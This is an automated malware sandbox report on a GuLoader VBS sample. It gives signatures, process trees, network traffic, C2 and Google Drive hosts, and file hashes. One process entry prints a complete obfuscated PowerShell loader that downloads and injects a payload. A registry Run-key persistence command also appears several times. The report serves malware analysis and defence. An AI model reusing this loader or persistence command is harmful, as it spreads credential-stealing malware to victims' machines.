Analysis Overview
SHA256
337aa6bceb4103aa9327b569ba6809401221948a6c6386eb0ca20ffc47dbfcbb
Threat Level: Known bad
The file 337aa6bceb4103aa9327b569ba6809401221948a6c6386eb0ca20ffc47dbfcbb was found to be: Known bad.
Malicious Activity Summary
Guloader,Cloudeye
Nirsoft
NirSoft MailPassView
NirSoft WebBrowserPassView
Blocklisted process makes network request
Checks computer location settings
Legitimate hosting services abused for malware hosting/C2
Accesses Microsoft Outlook accounts
Adds Run key to start application
Suspicious use of NtSetInformationThreadHideFromDebugger
Suspicious use of SetThreadContext
Suspicious use of NtCreateThreadExHideFromDebugger
Enumerates physical storage devices
Suspicious use of AdjustPrivilegeToken
Modifies registry key
Runs ping.exe
Suspicious behavior: EnumeratesProcesses
Suspicious use of WriteProcessMemory
Suspicious use of SetWindowsHookEx
Suspicious behavior: MapViewOfSection
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-05-21 15:42
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-05-21 15:42
Reported
2024-05-21 15:45
Platform
win7-20240221-en
Max time kernel
121s
Max time network
122s
Command Line
Signatures
Guloader,Cloudeye
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Windows\CurrentVersion\Run\Kolinski = "%Siestas% -w 1 $Macrorhamphosidae=(Get-ItemProperty -Path 'HKCU:\\Disputeredes\\').Semimachine;%Siestas% ($Macrorhamphosidae)" | C:\Windows\SysWOW64\reg.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
Suspicious use of NtCreateThreadExHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2332 set thread context of 1784 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\windows mail\wab.exe |
Enumerates physical storage devices
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Swift 2024052130819616.vbs"
C:\Windows\System32\cmd.exe
cmd.exe /c ping 6777.6777.6777.677e
C:\Windows\system32\PING.EXE
ping 6777.6777.6777.677e
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Narco.Fla && echo t"
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Narco.Fla && echo t"
C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Kolinski" /t REG_EXPAND_SZ /d "%Siestas% -w 1 $Macrorhamphosidae=(Get-ItemProperty -Path 'HKCU:\Disputeredes\').Semimachine;%Siestas% ($Macrorhamphosidae)"
C:\Windows\SysWOW64\reg.exe
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Kolinski" /t REG_EXPAND_SZ /d "%Siestas% -w 1 $Macrorhamphosidae=(Get-ItemProperty -Path 'HKCU:\Disputeredes\').Semimachine;%Siestas% ($Macrorhamphosidae)"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 6777.6777.6777.677e | udp |
| US | 8.8.8.8:53 | drive.google.com | udp |
| GB | 142.250.187.238:443 | drive.google.com | tcp |
| US | 8.8.8.8:53 | drive.usercontent.google.com | udp |
| GB | 142.250.179.225:443 | drive.usercontent.google.com | tcp |
| GB | 142.250.187.238:443 | drive.google.com | tcp |
| GB | 142.250.179.225:443 | drive.usercontent.google.com | tcp |
Files
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\NMVHAWC4JUP45QYF4J1X.temp
| MD5 | d67dd93a9e8101b470d1515d0ed0bf71 |
| SHA1 | 8e669de97d9115b671c375568d4591c0d30add01 |
| SHA256 | a69a74ce6b0c93318557667b4b8dba78e8467e078fa4974677bcb0c2614a1fef |
| SHA512 | ca25afab24a62dc9bdc5f470153c0f10483dba5088f0c4b199760c68487907a20767ef6f2f546434aa6198251f2b648f1b7ec390453bb9ee484543e1917f1a01 |
C:\Users\Admin\AppData\Roaming\Narco.Fla
| MD5 | 5b31fdcca43851229c6ad5c0d5124d9e |
| SHA1 | 95243324bfd6acd008518e233e5ac3a7a29e67a5 |
| SHA256 | c288a9c83ad9236a539faddaaa2d90d0beb42cc28c9b2f8009676ccd15b6b842 |
| SHA512 | e4446a71ba0ce278980fdb6d286b55adcc97dd5b5a3c36da978de06916846bcc05cdf6ce8adb4176693b1d896c8ddd5499e37ab3ab08e8bac7468495c84038f5 |
Analysis: behavioral2
Detonation Overview
Submitted
2024-05-21 15:42
Reported
2024-05-21 15:45
Platform
win10v2004-20240426-en
Max time kernel
150s
Max time network
150s
Command Line
Signatures
Guloader,Cloudeye
NirSoft MailPassView
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
NirSoft WebBrowserPassView
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Nirsoft
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
Accesses Microsoft Outlook accounts
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Kolinski = "%Siestas% -w 1 $Macrorhamphosidae=(Get-ItemProperty -Path 'HKCU:\\Disputeredes\\').Semimachine;%Siestas% ($Macrorhamphosidae)" | C:\Windows\SysWOW64\reg.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
Suspicious use of NtCreateThreadExHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 784 set thread context of 3680 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\windows mail\wab.exe |
| PID 3680 set thread context of 2088 | N/A | C:\Program Files (x86)\windows mail\wab.exe | C:\Program Files (x86)\windows mail\wab.exe |
| PID 3680 set thread context of 5072 | N/A | C:\Program Files (x86)\windows mail\wab.exe | C:\Program Files (x86)\windows mail\wab.exe |
| PID 3680 set thread context of 5044 | N/A | C:\Program Files (x86)\windows mail\wab.exe | C:\Program Files (x86)\windows mail\wab.exe |
Enumerates physical storage devices
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Swift 2024052130819616.vbs"
C:\Windows\System32\cmd.exe
cmd.exe /c ping 6777.6777.6777.677e
C:\Windows\system32\PING.EXE
ping 6777.6777.6777.677e
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Dig,stsDestroytWaggonse G.ddeam Shad,w.overappT SeisemeS.ulledxApprecitUnjovia. Lipoc,EPu onslnRacewaycS,indeloAtebascdPrac,isi Digtenn nimalag Fremme]Unthrot:flleden: j rgonAfl ckleSupflowsCGo illaIShoolerIUnhateh.SidereaGSi.trygePylangitEffektfSDiscolotRet averHj rykfiVo panen SlandegKlasseh(Sko,dst$Ma.vrerLalgerieiDesinfis AtalanaTegnintn Rainwa6Ophirsn7Affects)Stavels ');Kend224 (Anspndelserne 'Unforma$Halliceg TappemlSt mpilo MaumetbLaanta aTrisoctlMeanies:BohvaerB WinnowoSha owho Skoledm RecarbiSekretinSiciliaeSealliksTailyeasnothosa=Folkesa$SkrmereUpibleden Stetsoa,inkkrteSvmmedys SchismtFrstediha.peteneIrreligtForv,rriaperturcM.talde.Zoblen,sColumnau,eminisbSindssvsRdbgenbt UnransrStvlungiKvalitenVgmalergWreathe(Damners$obstrukHLabio.ey StomodpFilmspae Kontanrphytoplg BoundeeTrytophnPrevente tilflytmes iniiPastoricIndis.u,Haffler$KorrektoMiracidv Motorce sabrelrGeneraleUnbastel,anglrka N.melsbSodfarvo.ariosrrNoseaneaInviriltForsgs eKorriged Ser,ph).agsene ');Kend224 $Boominess;"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Narco.Fla && echo t"
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Skyldkreds = 1;$Ramplor='Sub';$Ramplor+='strin';$Ramplor+='g';Function Anspndelserne($Heri){$Antinuke=$Heri.Length-$Skyldkreds;For($Epiderm=7;$Epiderm -lt $Antinuke;$Epiderm+=8){$Picucule+=$Heri.$Ramplor.Invoke( $Epiderm, $Skyldkreds);}$Picucule;}function Kend224($Glassworking){. ($Truckful) ($Glassworking);}$Forkamrenes=Anspndelserne ' MonterMStranneoLunchlezPrutteriU.instrlWoodwo lOxysulpaMeet,yk/Nonha i5achymou.Specifi0Immana Saf,ful(FlertegWTriaziniProportnMegalogdAanderto FractuwKommunesL,vligh UnderfaNJa.ksniTBe,tyre Feased1rosillo0Svinge,..fledni0Lyst ac;Choktil Modsag WImpr,viiK ncelln B,otiy6 Supera4 Semida;Cent.al SarracxConurb,6Udlndin4Ud.igts;monimol RainisrKontorpvUnderbe: Gnomem1Tulipom2 Cyklin1Watte,s.A jecti0Dece,eb)Aabni,g Cresp,G ,emtoneTrsto fc,ananerkFnomen,oFolkemi/Pseudos2beclus 0Oversig1 Bromph0Svingka0Sternog1 Udstop0 Daabsv1Ergonom DukkefrFTryksvaiKeglensrTingsviePilsnerfNonimplobil.oquxHenimod/Dd.dags1Overris2 Hetero1Defekte. madaga0 Monsun ';$Veldreven=Anspndelserne ' Mis erUUltrabosde,emine OpblomrO.culat-p.racroAInterv g Po,tereHahnemanIndermatBullen ';$Cobstone=Anspndelserne ' MultichMatu attPressu tPl,isanpAlabastsEksk rs:Vestali/Dic lor/RevisordStoppegrAcromyoiSubji,ivNonprece Ho.eyw.Or rynugHomekeeo llustroImmeasugSkyllerlFagklaseBetnk,i. oernesc museneoAuktionmConvers/ForespruJudoe,lcDandlep? 
SmokepeInter exKnudepupFrgemanoDoktrinrFiligratGodsvog= SketchdBetalinoVagtselwTilskrenPetiverlMissy,eoClymeniaInappredSentime&PhilokliJungiand Stewpa=Galman,1ads.adiRVildbaslSpinineKAvourekASkammek_,iledamFVi,rensKRepr enSSten,ul5Cholehe0InterinwDihyd,iDStrabadLHornotiyKonstruh enkaldpIsocreo9Organog_Steno rgR.turvrYToilet 2Menusysa ch,fffsSol rredBombard8schchtn5PaleifoWHarvesa3sodioal9 photogA engtellStraahaMKommuni ';$Ulivssaar=Anspndelserne ' Hylac,>Retspri ';$Truckful=Anspndelserne 'PushtuaiSuperhueStenf.uxK ypsis ';$Bosjesman='Rigsdanske';$Formaalsbestemmelserne = Anspndelserne 'VagtskreKompasscVragr,sh Bjrneso Breaka Rettede% Ofringa Vedstap Vasicip ycophadU,recreaHusassitWhanginaskendes%F.rviss\NonpromNLepryafaKulturhr StrekacLichenio Corro .RomantiFGysninglThr.bbeaBilledv Jesuit&Mithers&Bragget G.untre Skiffec TyldishTvebakkoBegraen CaudilltSelvhjl ';Kend224 (Anspndelserne 'Progres$Slikkepg E,uadolProfitroTurbomobG idesmagennemll .using: VoksbnMCrudesmaAmtskomrSeerstoiPlethysn BrokeneWat.hmarKonditon P.antaeAfskummsOpkalds=Lgtning(randrusc nrepenmiodousnd Opp,es Patholy/ B njerc Skrald Deonera$WimplelFsta,ionoHorsemereso hagmBeregniaPrint.raR.vfisklJern etsForspanbRubaceseSnittebs Flowert MyotoneBeskinnm Udeholm errucaeFriarealRemil.ts Us rmteTranedarantini,nAttachhemaskine)Forg,en ');Kend224 (Anspndelserne 'Picture$ RavishgBath.melSavbladoFabeldyb D,casuaBurundilBarkinj: GarrisJDatarefeTelefoneCementeiSpewersnUn etrigCor ute=Slaabro$FrontinCAtaraxioGigololbZillio,sKrysantt TosidioAllerhjnAssoc ee Forure.Savneths ,rsenkpIsoplerlLiteraei Velarpt Sammen(Sl,ende$IcemanbUPlastrelPeris.aiFuturelvWimbleds No,thmsS.defteaBraefacaSrlingsrHast.rk) Bluffp ');$Cobstone=$Jeeing[0];$Optionsordning= (Anspndelserne 'Peerdom$IllumingTrikot.lMaleducoHy,ramnbNecrogra fis,ehlIslamit:ArseniuSProverbpU,licityOpgrelstEfter,ekSolersmrKhmererl LejlfrlAandsf esacri.tnTrasse,sSankask=EndorseN.teropeeDesdemowUdsprjt-,ocometO Gt,parbChri tijHyp ospe Ddebogcph lofet omfru 
OmitslaSSekundayRese,svsAger.netChapatieKirt,erm sprjte.SandaflNHeksekeeD,pletat,ardehv.TeknokrWfictitieHayseedb Pre,omCGlederelCharliniGrundgreDep.oran trillit');$Optionsordning+=$Marinernes[1];Kend224 ($Optionsordning);Kend224 (Anspndelserne 'Sek.ual$ Udhng.SVo,ingvp inegay OphjedtRegnskakMislighrMicroselChairm,lSvidnine rneopsn Foli bsBaymans.HolostoHPsych deHaematoaQuillajdSmutteteHelte or Fact.asF lende[ Tilsen$ orskniVFlleskre ,tokrolTorulacdSandblsrFjeldm.ewhorishvDarw niepawditenPamirim]kvalite=Ancho a$InterpuFsotols,ounderflr UruguakM elopaaUnap,alm ,pithermonicageProtubenStickupeGulvmopsPuddern ');$Frugtknivenes=Anspndelserne 'Stanchl$HalapepSLotu.blpny,alkuyNumbestt Kom.ank,olfangr TrapfalSopranel illogieAnglesmnBinocsgsUnwarra.InfluerDFis.endo PoachewCann.binp.ndoril PseudooMed,rbealev.rand.iscoloFBovspryiJuleevalBetrkkeeFakulte(Underst$SpillssCTipvognoE.issiobprovocas Unsu.ctTraw.ero Sti,fonUnvulgae Workfi,pibekon$SkyggetB Styrkelu.skrifo bicompdinfusedd PaparaoVe turanApologioHeadnotrSygdomseEtnologr Pr sopsUn vers)Rapacit ';$Bloddonorers=$Marinernes[0];Kend224 (Anspndelserne 'Obligat$TvrdraggBeevesplUrocentoLithatebUlideliaOutpushlInd,aae:,ttemasUEmpha.in.epatouf B.bestiErobr,nrN dsttemOfficern Pho eseUddeligsHitzco starveli=Piruett(ReturneT Recolle HanebjsHv,lepetEarlock-SatelliPMarasmoaForkludtlimn,phhach.lic .asagna$MortensBkatederlIn.stbeoS apsegdPlagiardQ,euerjo Promenn GeissooMotorbrr skabereKlatjedrHaemsses ostkor)Kra ile ');while (!$Unfirmness) {Kend224 (Anspndelserne 'Ban ing$ Non.ergTillidsl R.ngstoHu,mendbOvertimaBiofysilEpidias:DorerenTFrygtlorTangsp.aharc.lefHexadaci.udgetdkMerittem Schalmi S.ovlfnBenbevgiMetzuinsOldemodt FascikeTelpherrOsteope=Afbdend$formu.itEnegretrUnse,siuElegiaceFormidl ') ;Kend224 $Frugtknivenes;Kend224 (Anspndelserne ' ourishS SystemtSkrmforaKromskorGendannt Pinsel- MaanedSTortonilOmvltefeStereoreDe ikatp ekspon Whiglet4submers ');Kend224 (Anspndelserne 'Smaahan$ entalig WarfarlT,rmoploFlovesfbrdvigsea I 
dfinlLegepla: BirdliU unentanAna,ysefAm,hibiiStyrke.r Portatm IrrecenForderne toxicosUparti,sPrester=T,gntyp(Leas obTCompleteDu denosAnisos.tLav,ing-budgetoP imillaPy.oanttWeytymph Sogneg C.nsign$SkovvejBHunge.rl.catteroRedem,ndKonflikdTegnfoeoPrea.cinSejlgaro FarvetrAbitibieOutc,rerNonpondsIr dium)Forskni ') ;Kend224 (Anspndelserne 'Acropho$Oplreleg SkitselAlipteroCuritisbDiscomfa AdresslViseli,:Pi,fingCCirkulrhFremturrSkinmano Tar ntmUnhungri Absei.tHeat ene.pringnsHarmoni=Emissio$vestalmgSucces l Insur.oOph.halbAetomoraPistilllEskor.e:SpandgaSVagariokNullsniyProbatik Nonmatl IntellaSprr.ilpCompilepMaxierneGownanirDuelbet+Tredjed+Twifoil% Magnet$funktioJTankereeZeteticeDrfttyviAfh ldsn pre.cug rogger.D,collacAmarillo SnagesuuvenskanSkaerp,t Ch.yso ') ;$Cobstone=$Jeeing[$Chromites];}$Hypergenetic=335367;$overelaborated=30549;Kend224 (Anspndelserne 'Unallev$ anggldgHenequelAkslendob umairbUheldiga Ddsstrl Medlem:kemotergRnnebrgiSkelstenRekviemsSuper,lb,istrese BlanderAsterisg,opples Karambo=Opk app R derneGNecromae Fllesut Excell-FossernCDe astmoCaistaanPetticotKo erneeObdt,trnSkraatotscenasb Regiens$EmbedseB Undi fl Poker oEremitidLoculardBreatheoE iminen Aeronro EntrearKrydstoeGastermrPara ets Skovse ');Kend224 (Anspndelserne 'Snurret$ ThermigKalasetlPacesetoTranslab BaggagaGra slelMarinb.:FlushinLspunseniBob edesNonadvaaAntechan Fatteg6 Ju,edi7Holysto dentato=Lysshow Nierste[ KagemaSJowlbenyForesprsInd.andt,epravieMimsey,m Coying.Faub.urCAdlegiaoBindingn JazzorvNonillue Skatkar IndfartVerdens] chwei:Menne k:Ke,neldFSpec alrtenebr.ogrothitmIndstilB Neighba GeotersHerediteSil.igs6Quesc,y4ConvincSComprestDar eelrLsen leiequiponnPrintergOb tipa(Sprhjul$Py rhicgCeilingiHjer.efnStriatusU.scantbTewerheeIndvalgrcoriarigvo,mens)Disseas ');Kend224 (Anspndelserne ' Visitt$CavilsqgGavel,glSial.deoDa.delpbVi tigha Striktl Fjeder:DippercUBryds.mnsu erabaOrientaeHove,vasBifi.urtBacketchA preheeNyttigmt UndvigiPres.dec Trllea Braknin=Rdselsf Leotard[ indbanSadvokaty 
Dig,stsDestroytWaggonse G.ddeam Shad,w.overappT SeisemeS.ulledxApprecitUnjovia. Lipoc,EPu onslnRacewaycS,indeloAtebascdPrac,isi Digtenn nimalag Fremme]Unthrot:flleden: j rgonAfl ckleSupflowsCGo illaIShoolerIUnhateh.SidereaGSi.trygePylangitEffektfSDiscolotRet averHj rykfiVo panen SlandegKlasseh(Sko,dst$Ma.vrerLalgerieiDesinfis AtalanaTegnintn Rainwa6Ophirsn7Affects)Stavels ');Kend224 (Anspndelserne 'Unforma$Halliceg TappemlSt mpilo MaumetbLaanta aTrisoctlMeanies:BohvaerB WinnowoSha owho Skoledm RecarbiSekretinSiciliaeSealliksTailyeasnothosa=Folkesa$SkrmereUpibleden Stetsoa,inkkrteSvmmedys SchismtFrstediha.peteneIrreligtForv,rriaperturcM.talde.Zoblen,sColumnau,eminisbSindssvsRdbgenbt UnransrStvlungiKvalitenVgmalergWreathe(Damners$obstrukHLabio.ey StomodpFilmspae Kontanrphytoplg BoundeeTrytophnPrevente tilflytmes iniiPastoricIndis.u,Haffler$KorrektoMiracidv Motorce sabrelrGeneraleUnbastel,anglrka N.melsbSodfarvo.ariosrrNoseaneaInviriltForsgs eKorriged Ser,ph).agsene ');Kend224 $Boominess;"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Narco.Fla && echo t"
C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Kolinski" /t REG_EXPAND_SZ /d "%Siestas% -w 1 $Macrorhamphosidae=(Get-ItemProperty -Path 'HKCU:\Disputeredes\').Semimachine;%Siestas% ($Macrorhamphosidae)"
C:\Windows\SysWOW64\reg.exe
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Kolinski" /t REG_EXPAND_SZ /d "%Siestas% -w 1 $Macrorhamphosidae=(Get-ItemProperty -Path 'HKCU:\Disputeredes\').Semimachine;%Siestas% ($Macrorhamphosidae)"
C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\bmnddfrn"
C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\mgsweybhmfe"
C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\mgsweybhmfe"
C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\wjygfqmaioxwboe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 6777.6777.6777.677e | udp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | drive.google.com | udp |
| GB | 142.250.187.238:443 | drive.google.com | tcp |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 91.90.14.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | drive.usercontent.google.com | udp |
| GB | 142.250.179.225:443 | drive.usercontent.google.com | tcp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 225.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.181.190.20.in-addr.arpa | udp |
| NL | 23.62.61.185:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 185.61.62.23.in-addr.arpa | udp |
| NL | 23.62.61.185:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| GB | 142.250.187.238:443 | drive.google.com | tcp |
| GB | 142.250.179.225:443 | drive.usercontent.google.com | tcp |
| US | 8.8.8.8:53 | 67.169.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ab9001.ddns.net | udp |
| NL | 94.156.67.228:9001 | ab9001.ddns.net | tcp |
| US | 8.8.8.8:53 | 228.67.156.94.in-addr.arpa | udp |
| NL | 94.156.67.228:9001 | ab9001.ddns.net | tcp |
| NL | 94.156.67.228:9001 | ab9001.ddns.net | tcp |
| US | 8.8.8.8:53 | geoplugin.net | udp |
| NL | 94.156.67.228:9001 | ab9001.ddns.net | tcp |
| NL | 178.237.33.50:80 | geoplugin.net | tcp |
| US | 8.8.8.8:53 | 50.33.237.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| NL | 94.156.67.228:9001 | ab9001.ddns.net | tcp |
| NL | 94.156.67.228:9001 | ab9001.ddns.net | tcp |
| US | 8.8.8.8:53 | 247.211.222.173.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 45.19.74.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 82.90.14.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 200.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.173.189.20.in-addr.arpa | udp |
Files
memory/2168-0-0x00007FFE24C43000-0x00007FFE24C45000-memory.dmp
memory/2168-1-0x0000020E27640000-0x0000020E27662000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5svx45gr.ku2.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
